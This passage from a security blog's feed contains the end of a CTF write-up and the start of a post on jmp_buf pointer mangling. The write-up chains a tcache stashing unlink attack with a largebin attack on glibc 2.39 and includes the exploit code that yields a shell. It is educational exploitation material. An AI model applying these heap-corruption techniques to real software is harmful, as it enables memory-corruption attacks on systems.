&lt;p&gt;&lt;img src=&quot;images/checksec.webp&quot; alt=&quot;checksec output showing all security mitigations active.&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;blind heap exploitation&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;images/headline.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;We need a way to make &lt;code&gt;malloc()&lt;/code&gt; return our admin pointer instead of a normal chunk. This would normally be solved with a tcache poisoning attack, but without a leak we cannot recover the mangling key (I wrote about this key in a past writeup: &lt;a href=&quot;https://blog.davidherm.es/posts/babyheap/#tcache-poisoning&quot;&gt;link&lt;/a&gt;). So is it possible to make malloc return an arbitrary memory location through the tcache without having to deal with the mangling key? Well...&lt;/p&gt;
&lt;h2&gt;tcache stashing unlink attack&lt;/h2&gt;
&lt;p&gt;This technique abuses a mechanism within the smallbins to move a user-controlled pointer into the tcache without needing to leak the tcache mangling key.&lt;/p&gt;
&lt;h3&gt;smallbins&lt;/h3&gt;
&lt;p&gt;Smallbins are &lt;strong&gt;circular doubly-linked lists&lt;/strong&gt; that operate in a &lt;strong&gt;FIFO (First-In, First-Out)&lt;/strong&gt; fashion, unlike the LIFO (Last-In, First-Out) order used by the tcache and the fastbins.
New chunks are inserted at the &lt;strong&gt;head&lt;/strong&gt; (the front) of the bin and removed from the &lt;strong&gt;tail&lt;/strong&gt; (the back) for allocation. On 64-bit systems, smallbins manage chunks ranging from &lt;code&gt;0x20&lt;/code&gt; to &lt;code&gt;0x3F0&lt;/code&gt; bytes. Unlike tcache lists, smallbins have no fixed limit on the number of chunks they hold.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/smallbin.webp&quot; alt=&quot;Representation of smallbins&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The smallbin size classes &lt;strong&gt;overlap&lt;/strong&gt; with the tcache sizes. The reason is that each tcache list can store only seven chunks. When the tcache list is full, the allocator must decide where to store the chunk being freed. Chunks fitting fastbin sizes (typically &lt;code&gt;0x20&lt;/code&gt; to &lt;code&gt;0x80&lt;/code&gt; bytes) are stored in the fastbins. Larger chunks (up to &lt;code&gt;0x3F0&lt;/code&gt; bytes for smallbins) are first placed into the &lt;strong&gt;Unsorted Bin&lt;/strong&gt;. They are only sorted into their respective smallbins during a subsequent &lt;code&gt;malloc&lt;/code&gt; request.&lt;/p&gt;
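&lt;p&gt;To make these routing rules concrete, here is a rough model of where a freed chunk goes. It is only a sketch under stated assumptions: 64-bit glibc 2.39 with default tunables, no consolidation with neighbouring chunks or the top chunk, and hypothetical helper names (&lt;code&gt;chunk_size&lt;/code&gt;, &lt;code&gt;free_destination&lt;/code&gt;, &lt;code&gt;sorted_into&lt;/code&gt;) that do not exist in glibc.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TCACHE_SLOTS = 7    # default number of entries per tcache list

def chunk_size(request):
    # Add the 8-byte size field, round up to 16 bytes, enforce the 0x20 minimum
    return max(0x20, (request + 8 + 15) // 16 * 16)

def free_destination(size, tcache_count):
    # Where free() puts a chunk of this size, given how full its tcache list is
    if size in range(0x20, 0x411) and tcache_count != TCACHE_SLOTS:
        return 'tcache'
    if size in range(0x20, 0x81):
        return 'fastbin'
    return 'unsorted bin'

def sorted_into(size):
    # Bin an unsorted chunk ends up in during a later malloc call
    return 'smallbin' if size in range(0x20, 0x400) else 'largebin'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For instance, &lt;code&gt;chunk_size(0x90)&lt;/code&gt; is &lt;code&gt;0xa0&lt;/code&gt;: the first seven frees of that size land in the tcache, the eighth goes to the unsorted bin, and a later malloc sorts it into a smallbin.&lt;/p&gt;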
&lt;h3&gt;tcache stashing&lt;/h3&gt;
&lt;p&gt;Because we mostly prefer to have our target chunk in the tcache, we can leverage a smallbin mechanism called &lt;em&gt;tcache stashing&lt;/em&gt;. Simply put, when a chunk is served from a smallbin while the tcache list of that size is not full, the requested chunk is returned to the user, and the remaining chunks in that smallbin get moved into the tcache until it is full or the smallbin is empty. &lt;strong&gt;The major advantage here is that smallbins do not mangle their pointers&lt;/strong&gt;. Therefore, if we can poison a smallbin chunk, we can move a user-controlled pointer into the tcache without having to leak a mangled pointer.&lt;/p&gt;
&lt;p&gt;Let&apos;s look at the glibc code that handles the stashing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
// GLIBC 2.39 _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L3998)

if (in_smallbin_range (nb))
    {
		
		... malloc returns smallbin chunk ...
		
	      /* While bin not empty and tcache not full, copy chunks over.  */
	    while (tcache-&amp;gt;counts[tc_idx] &amp;lt; mp_.tcache_count
			&amp;amp;&amp;amp; (tc_victim = last (bin)) != bin) {
			
			//tc_victim is the chunk we want to stash, as you can see we always take the last one from the smallbin.
			
			if (tc_victim != 0)
			{
				bck = tc_victim-&amp;gt;bk; //the chunk before the last one.
				set_inuse_bit_at_offset (tc_victim, nb);
				if (av != &amp;amp;main_arena)
					set_non_main_arena (tc_victim);
				bin-&amp;gt;bk = bck;   // Vulnerability
				bck-&amp;gt;fd = bin;
				tcache_put (tc_victim, tc_idx);
			}
		}
	}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we poison the &lt;code&gt;bk&lt;/code&gt; pointer of a smallbin chunk so that it points to an arbitrary memory area, once the chunk gets stashed, at the next iteration, &lt;code&gt;tc_victim&lt;/code&gt; will equal our arbitrary memory pointer.&lt;/p&gt;
&lt;p&gt;But the line directly after our vulnerability creates a problem: &lt;code&gt;bck-&amp;gt;fd = bin&lt;/code&gt; &lt;strong&gt;dereferences the value stored in the&lt;/strong&gt; &lt;code&gt;bk&lt;/code&gt; &lt;strong&gt;position&lt;/strong&gt; of our fake chunk. Consequently, it is necessary that the &lt;code&gt;bk&lt;/code&gt; field of our fake chunk contains a &lt;strong&gt;valid, writable address&lt;/strong&gt;. This ensures the pointer can be dereferenced without crashing, allowing the execution to successfully reach the &lt;code&gt;tcache_put(my_pointer, tc_idx)&lt;/code&gt; function.&lt;/p&gt;
&lt;p&gt;We also need to remember that the stashing mechanism keeps moving chunks until the tcache list holds seven entries. &lt;strong&gt;When we poison a smallbin chunk we destroy the circular linked list&lt;/strong&gt;, so we need to be careful about which chunk we poison. The best practice is to modify the 6th chunk so that our fake admin chunk becomes the seventh.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/smallbin_poison.webp&quot; alt=&quot;State of the list after smallbin poisoning.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;:::warning
This method alone &lt;strong&gt;will not work&lt;/strong&gt;. Our admin memory area is completely empty (all zeroes), so the loop would read a null pointer from &lt;code&gt;admin + 0x08&lt;/code&gt;, try to &lt;strong&gt;write through it&lt;/strong&gt;, and immediately crash the program.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bck = tc_victim-&amp;gt;bk; // Reads from admin + 0x08 ...
bck-&amp;gt;fd = bin;       // Segfaults if bck isn&apos;t a valid, writable pointer
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But for argument&apos;s sake, let&apos;s imagine that there is a valid pointer there. We will see later how to place one at that position.
:::&lt;/p&gt;
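&lt;p&gt;Both the stashing loop and the crash can be replayed on a toy memory model. The sketch below is not glibc code: memory is a dictionary from chunk address to its &lt;code&gt;fd&lt;/code&gt; and &lt;code&gt;bk&lt;/code&gt; fields, a missing key stands in for a segfault, and &lt;code&gt;BIN&lt;/code&gt;, &lt;code&gt;SCRATCH&lt;/code&gt; and the chunk addresses are made-up values. It also assumes that six real chunks are still in the smallbin when the loop starts, so that the fake chunk is the seventh one stashed.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TCACHE_MAX = 7        # default mp_.tcache_count
ADMIN = 0x1337000     # fixed mmap address from the challenge
BIN = 0x7000          # hypothetical address of the smallbin header
SCRATCH = 0x9000      # hypothetical writable address planted in the fake bk

def stash(mem, tcache):
    # Replay of the stashing loop; a KeyError models a segfault
    while len(tcache) != TCACHE_MAX and mem[BIN]['bk'] != BIN:
        victim = mem[BIN]['bk']      # tc_victim = last (bin)
        bck = mem[victim]['bk']      # the chunk before the last one
        mem[BIN]['bk'] = bck         # the bin now follows the (possibly poisoned) pointer
        mem[bck]['fd'] = BIN         # write through bck: needs mapped, writable memory
        tcache.insert(0, victim)     # tcache_put pushes at the head of the list
    return tcache

def demo(fake_bk):
    chunks = [0x8000 + 0x100 * i for i in range(6)]    # six real chunks, oldest first
    mem = {BIN: {'fd': chunks[-1], 'bk': chunks[0]}, SCRATCH: {'fd': 0, 'bk': 0}}
    for older, addr, newer in zip([BIN] + chunks, chunks, chunks[1:] + [BIN]):
        mem[addr] = {'fd': older, 'bk': newer}
    fake = ADMIN - 0x10
    mem[chunks[-1]]['bk'] = fake             # poison the head chunk
    mem[fake] = {'fd': 0, 'bk': fake_bk}     # what the loop reads from the admin page
    return stash(mem, [])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;demo(SCRATCH)&lt;/code&gt; returns seven entries with the fake chunk at the head, so the next malloc of that size would hand out &lt;code&gt;fake + 0x10&lt;/code&gt;, which is &lt;code&gt;ADMIN&lt;/code&gt;. &lt;code&gt;demo(0)&lt;/code&gt; raises a &lt;code&gt;KeyError&lt;/code&gt; instead, the toy equivalent of the crash described in the warning.&lt;/p&gt;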
&lt;h3&gt;The attack in practice&lt;/h3&gt;
&lt;p&gt;:::note
You can find a more general explanation of this attack in the shellphish how2heap repo: &lt;a href=&quot;https://github.com/shellphish/how2heap/blob/master/glibc_2.35/tcache_stashing_unlink_attack.c&quot;&gt;link&lt;/a&gt;
:::&lt;/p&gt;
&lt;p&gt;We can allocate 7 chunks of size &lt;code&gt;0x90&lt;/code&gt; that will be used to fill the tcache. After that, we allocate 6 chunks of the same size destined for the smallbin list, placing a &lt;code&gt;0x10&lt;/code&gt; guard chunk after each of them so that they do not get coalesced. Then, we free the 7 tcache chunks, followed by the 6 smallbin chunks (but not the guard chunks).
The 6 smallbin chunks are placed in the unsorted bin first, so we must allocate a sufficiently large chunk to get them sorted into the smallbin list.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/bins_stash_unlin1.webp&quot; alt=&quot;Image of pwndbg that shows how the stash unlink attack works.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Now we can overwrite the &lt;code&gt;bk&lt;/code&gt; pointer of the smallbin chunk at the head of the list with the &lt;code&gt;&amp;amp;admin - 0x10&lt;/code&gt; address. After this, the &lt;code&gt;bins&lt;/code&gt; view changes slightly:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/bins_stash_unlink2.webp&quot; alt=&quot;After the stash unlink attack&quot; /&gt;&lt;/p&gt;
&lt;p&gt;If we now allocate 8 &lt;code&gt;0x90&lt;/code&gt; sized chunks, we would find the admin pointer in the tcache bin! But as I said before, we still need a valid pointer in the &lt;code&gt;bk&lt;/code&gt; field of the fake chunk.&lt;/p&gt;
&lt;h2&gt;Largebin attack&lt;/h2&gt;
&lt;p&gt;This attack will help us move a heap pointer into the admin area. It does not really matter what kind of pointer we use, as long as it is &lt;strong&gt;dereferenceable&lt;/strong&gt; and the memory area it points to is writable. To pull this off, we need to understand how largebins work.&lt;/p&gt;
&lt;h3&gt;Largebins&lt;/h3&gt;
&lt;p&gt;Largebins follow some of the same basic rules as smallbins: freed chunks are first stored in the unsorted bin, and if they are large enough (at least &lt;code&gt;0x400&lt;/code&gt; bytes on 64-bit x86) they are sorted into the largebins at the next malloc call. They also have the usual &lt;code&gt;fd&lt;/code&gt; and &lt;code&gt;bk&lt;/code&gt; pointers to maintain the doubly linked list. In largebins, this primary list is kept in &lt;strong&gt;decreasing&lt;/strong&gt; order of chunk size.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/largebin_simple.webp&quot; alt=&quot;Schema showing how largebin lists work&quot; /&gt;&lt;/p&gt;
&lt;p&gt;A notable addition is a &lt;strong&gt;second&lt;/strong&gt; circular doubly linked list. For efficiency reasons, different sizes are stored in the same bin (&lt;code&gt;0x400 - 0x43F, 0x440 - 0x47F&lt;/code&gt;, etc.). The &lt;code&gt;fd_nextsize&lt;/code&gt; and &lt;code&gt;bk_nextsize&lt;/code&gt; pointers are used to quickly jump to the right size without having to scan every single chunk; only the first chunk of each size keeps them. To avoid the overhead of moving the &lt;code&gt;_nextsize&lt;/code&gt; pointers, a malloc operation removes the tail chunk of a specific size.&lt;/p&gt;
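&lt;p&gt;The bin ranges above follow from a simple formula. The sketch below mirrors only the first tier of glibc&apos;s 64-bit largebin index computation, which covers chunk sizes from &lt;code&gt;0x400&lt;/code&gt; to &lt;code&gt;0xC3F&lt;/code&gt; in 64-byte steps. That is enough here because the challenge caps allocations at &lt;code&gt;0x500&lt;/code&gt; bytes. The function name is borrowed from the glibc macro, but the Python version is only an illustration.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def largebin_index(size):
    # First tier only: 64-byte wide bins for chunk sizes 0x400 up to 0xc3f
    if size not in range(0x400, 0xc40):
        raise ValueError('outside the 64-byte spaced largebins')
    return 48 + size // 64
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Chunk sizes &lt;code&gt;0x420&lt;/code&gt; and &lt;code&gt;0x430&lt;/code&gt; both map to index 64, so two chunks of these sizes share one largebin while still having different sizes. This is exactly the situation the largebin attack needs.&lt;/p&gt;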
&lt;h4&gt;Example scenario&lt;/h4&gt;
&lt;p&gt;When new chunks of an existing size are added, they are inserted right after the head chunk of that size. The diagram below shows that &lt;strong&gt;LC3&lt;/strong&gt; was the first &lt;code&gt;0x420&lt;/code&gt; chunk added, making it the head that maintains the &lt;code&gt;_nextsize&lt;/code&gt; pointers. When LC4 is sorted in, it is added directly after the head. A hypothetical LC7 with size &lt;code&gt;0x420&lt;/code&gt; would then be added between LC3 and LC4. When a chunk of size &lt;code&gt;0x420&lt;/code&gt; is allocated, the tail chunk is removed; in our example that is LC4.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/largebin_nextsize.webp&quot; alt=&quot;Largebins nextsize pointers in action&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;The attack&lt;/h3&gt;
&lt;p&gt;The attack gives us a write of a heap pointer to an arbitrary address, which is perfect for the &lt;strong&gt;dereferencing&lt;/strong&gt; problem we have with the tcache stashing unlink attack.
The following &lt;code&gt;_int_malloc()&lt;/code&gt; code handles the sorting of a new chunk (victim) into the largebin in the specific case where it is smaller than every chunk already in the bin.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// GLIBC 2.39 _int_malloc https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L4169

victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck-&amp;gt;fd;

/* maintain large bins in sorted order */
if (fwd != bck) {

    ... stuff ...
    
    /* if smaller than smallest, bypass loop below */
    assert (chunk_main_arena (bck-&amp;gt;bk));
    if ((unsigned long) (size) &amp;lt; (unsigned long) chunksize_nomask (bck-&amp;gt;bk)) {
        fwd = bck; //the bin
        bck = bck-&amp;gt;bk; //last chunk
        
        victim-&amp;gt;fd_nextsize = fwd-&amp;gt;fd; //the biggest head chunk
        
        victim-&amp;gt;bk_nextsize = fwd-&amp;gt;fd-&amp;gt;bk_nextsize; // !!!
        fwd-&amp;gt;fd-&amp;gt;bk_nextsize = victim-&amp;gt;bk_nextsize-&amp;gt;fd_nextsize = victim; // !!!
        //  the line above can be rewritten as
        //  fwd-&amp;gt;fd-&amp;gt;bk_nextsize = victim;
        //  victim-&amp;gt;bk_nextsize-&amp;gt;fd_nextsize = victim;
    }
    else
    {
	    ... stuff ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I marked the important lines with some exclamation marks. Let&apos;s imagine we have a big chunk in the largebin, and we are currently moving a smaller one into the same largebin. If we poison the &lt;code&gt;bk_nextsize&lt;/code&gt; of the large chunk with another writable address, for example &lt;code&gt;&amp;amp;admin&lt;/code&gt;, the code effectively becomes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;victim-&amp;gt;bk_nextsize = admin; //&amp;amp;admin gets stored in bk_nextsize of our victim.
fwd-&amp;gt;fd-&amp;gt;bk_nextsize = victim; //not important
victim-&amp;gt;bk_nextsize-&amp;gt;fd_nextsize = victim; //we store a pointer to victim inside the fd_nextsize of admin (admin+0x20)
&lt;/code&gt;&lt;/pre&gt;
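&lt;p&gt;Knowing this, we simply need to poison the &lt;code&gt;bk_nextsize&lt;/code&gt; of the large chunk with &lt;code&gt;admin-0x18&lt;/code&gt;. Since &lt;code&gt;fd_nextsize&lt;/code&gt; sits at offset &lt;code&gt;0x20&lt;/code&gt; inside a chunk, the write lands at &lt;code&gt;admin-0x18+0x20 = admin+0x08&lt;/code&gt;. That is exactly the &lt;code&gt;bk&lt;/code&gt; position of the fake chunk at &lt;code&gt;admin-0x10&lt;/code&gt; used in the stashing unlink attack.&lt;/p&gt;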
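&lt;p&gt;The offset arithmetic is easy to get wrong, so here it is spelled out as a small sketch. The field offsets are those of &lt;code&gt;struct malloc_chunk&lt;/code&gt; on 64-bit glibc; the helper names are made up for this example.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Field offsets inside struct malloc_chunk on 64-bit glibc
OFF = {'prev_size': 0x00, 'size': 0x08, 'fd': 0x10, 'bk': 0x18,
       'fd_nextsize': 0x20, 'bk_nextsize': 0x28}
ADMIN = 0x1337000    # fixed mmap address from the challenge

def largebin_write_target(poisoned_bk_nextsize):
    # The attack writes the victim pointer into the fd_nextsize field of this address
    return poisoned_bk_nextsize + OFF['fd_nextsize']

def poison_value_for(target):
    # Value to place in bk_nextsize so that the write lands on target
    return target - OFF['fd_nextsize']

fake_chunk = ADMIN - 0x10              # fake chunk whose user data starts at ADMIN
fake_bk = fake_chunk + OFF['bk']       # the field the stashing loop dereferences
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here &lt;code&gt;fake_bk&lt;/code&gt; is &lt;code&gt;ADMIN + 0x8&lt;/code&gt; and &lt;code&gt;poison_value_for(fake_bk)&lt;/code&gt; is &lt;code&gt;ADMIN - 0x18&lt;/code&gt;, the value used in the exploit.&lt;/p&gt;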
&lt;p&gt;:::note
You can find a more general explanation of this attack in the shellphish how2heap repo: &lt;a href=&quot;https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c&quot;&gt;link&lt;/a&gt;
:::&lt;/p&gt;
&lt;h2&gt;Exploit goes brrr&lt;/h2&gt;
&lt;p&gt;Now that we understand how the two attacks work, we can chain them. We need to be careful not to break anything along the way. Let&apos;s start with the largebin part:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    create(r, 1, 0x420) #Big one, we want to poison this one
    create(r, 2, 0x10)  #Guard
    create(r, 3, 0x410) #Small one, our victim
    create(r, 0, 0x10)  #Guard
    
    #Deleting chunk and allocating bigger chunk to move it to largebins
    delete(r, 1)        
    create(r, 0, 0x4a0)
    
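    #Poisoning the large chunk through the use after free
    copy(r, 2, 1)    #save the first 0x10 bytes of chunk 1 (fd and bk) into guard chunk 2
    update(r, 1, b&quot;A&quot;*0x10 + p64(0) + p64(admin-0x18) + b&quot;B&quot;*0x400)    #fd_nextsize = 0, bk_nextsize = admin-0x18
    copy(r, 1, 2)    #restore the original fd and bk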
    
    #Deleting the small one
    delete(r, 3)
    create(r, 0, 0x4a0)
    
    #Cleaning the heap because we are good citizens
    create(r, 0, 0x400)
    create(r, 0, 0x3e0)
    create(r, 0, 0x30)

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The last part removes leftover chunks from the free lists. If we now look at the &lt;code&gt;*admin&lt;/code&gt; area, we should find a heap pointer there.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/admin_area.webp&quot; alt=&quot;Admin memory area seen through pwndbg&quot; /&gt;&lt;/p&gt;
&lt;p&gt;After this, the stage is prepared for our smallbin shenanigans.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    #creating 7 tcache chunks
    for a in range(4, 11):
        create(r, a, 0x90)
    
    #creating 6 smallbin chunks + guards
    for a in range(11, 17):
        create(r, a, 0x90)
        create(r, 0, 0x10) #guard
       
    #populating tcache and smallbins
    for a in range(4, 17):
        delete(r, a)
    create(r, 0, 0x400)
    
    #Poisoning the last smallbin added (head of the list)
    update(r, 16, p64(0) + p64(admin-0x10) + b&quot;B&quot;*0x80)
    
    #Removing the tcache bins
    for a in range(7):
        create(r, 0, 0x90)
       
    #Triggering stash unlink
    create(r, 0, 0x90)
    
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking in the &lt;code&gt;bins&lt;/code&gt; we should see our chunk in the tcache list ready to be used.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/final_heap.webp&quot; alt=&quot;Final heap state&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The rest is easy. By allocating two chunks and writing into the second one, we can modify the admin area and store the required value there. Triggering the &lt;code&gt;win()&lt;/code&gt; menu option then gives us a shell and the flag.&lt;/p&gt;
</content:encoded><author>David Hermes</author></item><item><title>setjmp: jmp_buf exploitation</title><link>https://blog.davidherm.es/posts/jmp_buf</link><guid isPermaLink="true">https://blog.davidherm.es/posts/jmp_buf</guid><description>about the internal structure of jmp_buf, pointer mangling and how to exploit it.</description><pubDate>Fri, 29 May 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I participated in the TeamItaly.IT quals this weekend, the Italian pre-qualification CTF for the national team. One of the challenges centered around the &lt;code&gt;setjmp()&lt;/code&gt; and &lt;code&gt;longjmp()&lt;/code&gt; libc functions. I couldn&apos;t find many resources explaining their internals in a ctf context, so here is a short post on this fun technique.&lt;/p&gt;
&lt;h2&gt;setjmp and longjmp&lt;/h2&gt;
&lt;p&gt;While a standard &lt;code&gt;goto&lt;/code&gt; can only jump within the same function, the &lt;code&gt;setjmp&lt;/code&gt; and &lt;code&gt;longjmp&lt;/code&gt; combo acts as a non-local &lt;code&gt;goto&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;setjmp&lt;/code&gt; stores the state of the callee-saved registers (&lt;code&gt;RBX&lt;/code&gt;, &lt;code&gt;RBP&lt;/code&gt;, &lt;code&gt;R12&lt;/code&gt;-&lt;code&gt;R15&lt;/code&gt;), the stack pointer, and the instruction pointer into a buffer, and then returns zero. When &lt;code&gt;longjmp&lt;/code&gt; is subsequently called, the registers get restored from the buffer. &lt;code&gt;setjmp&lt;/code&gt; writes its own return address as the saved instruction pointer, so &lt;code&gt;longjmp&lt;/code&gt; resumes execution directly after the &lt;code&gt;setjmp&lt;/code&gt; call. Additionally, it sets the return value (stored in &lt;code&gt;rax&lt;/code&gt;) to the &lt;code&gt;val&lt;/code&gt; argument passed to &lt;code&gt;longjmp&lt;/code&gt; (or to 1 if &lt;code&gt;val&lt;/code&gt; is 0).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; #include &amp;lt;setjmp.h&amp;gt;
 int setjmp(jmp_buf env); //returns 0 when called directly
 void longjmp(jmp_buf env, int val); 
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;jmp_buf&lt;/h2&gt;
&lt;p&gt;So, how does &lt;code&gt;setjmp&lt;/code&gt; exactly save our registers? Well, looking into the libc implementation, we find this interesting &lt;code&gt;typedef&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/setjmp.h#L36
typedef struct __jmp_buf_tag jmp_buf[1];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;jmp_buf&lt;/code&gt; is defined as an array of only one element of type &lt;code&gt;__jmp_buf_tag&lt;/code&gt;. This is cool because when an array is passed in a function call, it &quot;decays&quot; into a pointer. Without this trick, we would need to prepend an &lt;code&gt;&amp;amp;&lt;/code&gt; in front of the argument. Let&apos;s look at &lt;code&gt;__jmp_buf_tag&lt;/code&gt; now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/bits/types/struct___jmp_buf_tag.h#L26
/* Calling environment, plus possibly a saved signal mask.  */
struct __jmp_buf_tag
{
	__jmp_buf __jmpbuf;		/* Calling environment.  */
	int __mask_was_saved;	/* Saved the signal mask?  */
	__sigset_t __saved_mask;	/* Saved signal mask.  */
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This struct doesn&apos;t really tell us much. Why are we now reading the word signal? Well, there is a variation of &lt;code&gt;setjmp&lt;/code&gt; called &lt;code&gt;sigsetjmp&lt;/code&gt; (along with &lt;code&gt;siglongjmp&lt;/code&gt;) that also saves the signal mask into the buffer.&lt;/p&gt;
&lt;p&gt;So for our case, only the first element of &lt;code&gt;__jmp_buf_tag&lt;/code&gt; is interesting. Let&apos;s look at it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/sysdeps/x86/bits/setjmp.h#L31
typedef long int __jmp_buf[8];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It&apos;s literally an 8-element, 64-bit integer array, nothing special. If we want to understand how the values are saved inside this array, it is easier to look directly through the lens of a debugger than to search through the many different implementations of &lt;code&gt;setjmp&lt;/code&gt; for all architectures. For x86-64, this is the layout of the &lt;code&gt;__jmp_buf[8]&lt;/code&gt; array:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;code&gt;__jmp_buf[8]&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;is mangled&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RBX&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RBP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R12&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R13&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R14&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;R15&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RSP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RIP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Wait, what does &lt;em&gt;mangled&lt;/em&gt; mean? Well, let&apos;s look at this example of a &lt;code&gt;__jmp_buf[8]&lt;/code&gt; array in memory:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/struct_in_memory.webp&quot; alt=&quot;__jmp_buf shown in pwndbg&quot; /&gt;&lt;/p&gt;
&lt;p&gt;As you can see, RBP, RSP, and RIP should all be addresses, but they got mangled in some way. This means that we cannot simply overwrite them with a new address to modify these registers.&lt;/p&gt;
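&lt;p&gt;When working with a dumped buffer, it helps to give the eight qwords names. The helper below is a small sketch that follows the table above; &lt;code&gt;parse_jmp_buf&lt;/code&gt;, &lt;code&gt;REGS&lt;/code&gt; and &lt;code&gt;MANGLED&lt;/code&gt; are hypothetical names, and the input is assumed to be the first 64 bytes of the buffer as read from memory.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;REGS = ['rbx', 'rbp', 'r12', 'r13', 'r14', 'r15', 'rsp', 'rip']
MANGLED = {'rbp', 'rsp', 'rip'}    # slots that hold mangled values

def parse_jmp_buf(raw):
    # Split the 64 bytes into eight little-endian qwords, one per saved register
    if len(raw) != 64:
        raise ValueError('expected exactly 64 bytes')
    return {name: int.from_bytes(raw[i * 8:i * 8 + 8], 'little')
            for i, name in enumerate(REGS)}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The values of the slots listed in &lt;code&gt;MANGLED&lt;/code&gt; are not usable addresses yet; they still have to go through the demangling step.&lt;/p&gt;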
&lt;h3&gt;breaking the mangling&lt;/h3&gt;
&lt;p&gt;By setting a breakpoint in the &lt;code&gt;__longjmp&lt;/code&gt; function in GDB, it is possible to understand exactly how the function demangles the pointers.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/image.webp&quot; alt=&quot;Asm that demangles the pointer in __longjmp&quot; /&gt;
&lt;img src=&quot;./images/image-1.webp&quot; alt=&quot;last instruction of the function&quot; /&gt;&lt;/p&gt;
&lt;p&gt;It first executes a &lt;code&gt;ror&lt;/code&gt; of 17 bits (&lt;code&gt;0x11&lt;/code&gt;), and then it XORs the resulting value with a predetermined key taken from the Thread Control Block at offset &lt;code&gt;0x30&lt;/code&gt; (&lt;code&gt;fs:0x30&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;:::note
